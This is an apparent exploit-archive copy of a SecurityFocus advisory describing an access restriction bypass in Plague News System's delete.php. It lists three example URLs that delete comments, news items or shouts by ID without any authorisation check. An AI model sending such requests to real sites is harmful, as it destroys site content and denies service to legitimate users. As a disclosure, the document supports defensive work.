9 lines
No EOL
553 B
Text
Executable file
9 lines
No EOL
553 B
Text
Executable file
source: http://www.securityfocus.com/bid/14139/info
|
|
|
|
Plague News System is prone to an access restriction bypass vulnerability. The issue exists due to a lack of sanity checks performed by 'delete.php' on deletion requests passed to the script.
|
|
|
|
A remote attacker may exploit this issue to delete site content and deny service for legitimate users.
|
|
|
|
http://www.example.com/delete.php?comment=1&id=[ID of comment here]
|
|
http://www.example.com/delete.php?news=1&id=[ID of news here]
|
|
http://www.example.com/delete.php?shout=1&id=[ID of shout here] |